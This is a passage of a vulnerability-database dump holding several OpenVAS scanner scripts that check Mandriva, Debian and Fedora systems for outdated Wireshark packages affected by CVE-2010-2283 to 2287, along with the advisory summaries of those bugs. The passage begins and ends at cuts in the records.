Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This advisory updates wireshark to the latest version(s), fixing\n several security issues:\n\n * The SMB dissector could dereference a NULL pointer. (Bug 4734)\n * J. Oquendo discovered that the ASN.1 BER dissector could overrun\n the stack.\n * The SMB PIPE dissector could dereference a NULL pointer on some\n platforms.\n * The SigComp Universal Decompressor Virtual Machine could go into\n an infinite loop. (Bug 4826)\n * The SigComp Universal Decompressor Virtual Machine could overrun\n a buffer. (Bug 4837)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-06/msg00009.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831071\");\n script_cve_id(\"CVE-2010-2283\",\"CVE-2010-2284\",\"CVE-2010-2285\",\"CVE-2010-2286\",\"CVE-2010-2287\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8296 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 08:28:01 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 13:46:51 +0200 (Fri, 11 Jun 2010)\");\n script_xref(name: \"MDVSA\", value: \"2010:113\");\n script_name(\"Mandriva Update for wireshark MDVSA-2010:113 (wireshark)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-18T10:58:25", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2010-06-11T00:00:00", "type": "openvas", "title": "Mandriva Update for wireshark MDVSA-2010:113 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2285", "CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286"], "modified": "2017-12-18T00:00:00", "id": "OPENVAS:831071", "href": "http://plugins.openvas.org/nasl.php?oid=831071", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for wireshark MDVSA-2010:113 (wireshark)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This advisory updates wireshark to the latest version(s), fixing\n several security issues:\n\n * The SMB dissector could dereference a NULL pointer. (Bug 4734)\n * J. Oquendo discovered that the ASN.1 BER dissector could overrun\n the stack.\n * The SMB PIPE dissector could dereference a NULL pointer on some\n platforms.\n * The SigComp Universal Decompressor Virtual Machine could go into\n an infinite loop. (Bug 4826)\n * The SigComp Universal Decompressor Virtual Machine could overrun\n a buffer. (Bug 4837)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-06/msg00009.php\");\n script_id(831071);\n script_cve_id(\"CVE-2010-2283\",\"CVE-2010-2284\",\"CVE-2010-2285\",\"CVE-2010-2286\",\"CVE-2010-2287\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8153 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-18 07:30:39 +0100 (Mon, 18 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 13:46:51 +0200 (Fri, 11 Jun 2010)\");\n script_xref(name: \"MDVSA\", value: \"2010:113\");\n script_name(\"Mandriva Update for wireshark MDVSA-2010:113 (wireshark)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of wireshark\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.14~0.1mdvmes5.1\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.2.9~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"dumpcap\", rpm:\"dumpcap~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark0\", rpm:\"libwireshark0~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwireshark-devel\", rpm:\"libwireshark-devel~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rawshark\", rpm:\"rawshark~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tshark\", rpm:\"tshark~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wireshark-tools\", rpm:\"wireshark-tools~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark0\", rpm:\"lib64wireshark0~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wireshark-devel\", rpm:\"lib64wireshark-devel~1.0.14~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:17", "description": "The remote host is missing an update to wireshark\nannounced via advisory DSA 2066-1.", "cvss3": {}, "published": "2010-07-06T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2066-1 (wireshark)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2285", "CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:67638", "href": "http://plugins.openvas.org/nasl.php?oid=67638", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2066_1.nasl 6614 2017-07-07 12:09:12Z cfischer $\n# Description: Auto-generated from advisory DSA 2066-1 (wireshark)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in the Wireshark\nnetwork traffic analyzer. It was discovered that null pointer\ndereferences, buffer overflows and infinite loops in the SMB, SMB\nPIPE, ASN1.1 and SigComp dissectors could lead to denial of service\nor the execution of arbitrary code.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.0.2-3+lenny9.\n\nFor the upcoming stable distribution (squeeze) and the unstable\ndistribution (sid), these problems have been fixed in version\n1.2.9-1.\n\nWe recommend that you upgrade your wireshark packages.\";\ntag_summary = \"The remote host is missing an update to wireshark\nannounced via advisory DSA 2066-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202066-1\";\n\n\nif(description)\n{\n script_id(67638);\n script_version(\"$Revision: 6614 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:12 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-06 02:35:12 +0200 (Tue, 06 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\");\n script_name(\"Debian Security Advisory DSA 2066-1 (wireshark)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wireshark-dev\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wireshark-common\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tshark\", ver:\"1.0.2-3+lenny9\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-20T13:18:49", "description": "Check for the Version of rpmdrake", "cvss3": {}, "published": "2010-04-09T00:00:00", "type": "openvas", "title": "Mandriva Update for rpmdrake MDVA-2010:113 (rpmdrake)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2285", "CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286"], "modified": "2017-12-19T00:00:00", "id": "OPENVAS:830968", "href": "http://plugins.openvas.org/nasl.php?oid=830968", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for rpmdrake MDVA-2010:113 (rpmdrake)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"rpmdrake on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_insight = \"This update fixes rpmdrake behavior when suggesting packages from\n disabled backports media (#40556).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00001.php\");\n script_id(830968);\n script_version(\"$Revision: 8164 $\");\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\",\n \"CVE-2010-2287\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 07:30:41 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-09 11:11:25 +0200 (Fri, 09 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVA\", value: \"2010:113\");\n script_name(\"Mandriva Update for rpmdrake MDVA-2010:113 (rpmdrake)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of rpmdrake\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"rpmdrake\", rpm:\"rpmdrake~5.23.1~1.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:30", "description": "Check for the Version of wireshark", "cvss3": {}, "published": "2011-01-14T00:00:00", "type": "openvas", "title": "Fedora Update for wireshark FEDORA-2011-0167", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2286", "CVE-2010-4538"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:862791", "href": "http://plugins.openvas.org/nasl.php?oid=862791", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wireshark FEDORA-2011-0167\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Wireshark is a network traffic analyzer for Unix-ish operating systems.\n\n This package lays base for libpcap, a packet capture and filtering\n library, contains command-line utilities, contains plugins and\n documentation for wireshark. A graphical user interface is packaged\n separately to GTK+ package.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"wireshark on Fedora 13\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-January/053061.html\");\n script_id(862791);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-14 16:07:43 +0100 (Fri, 14 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", 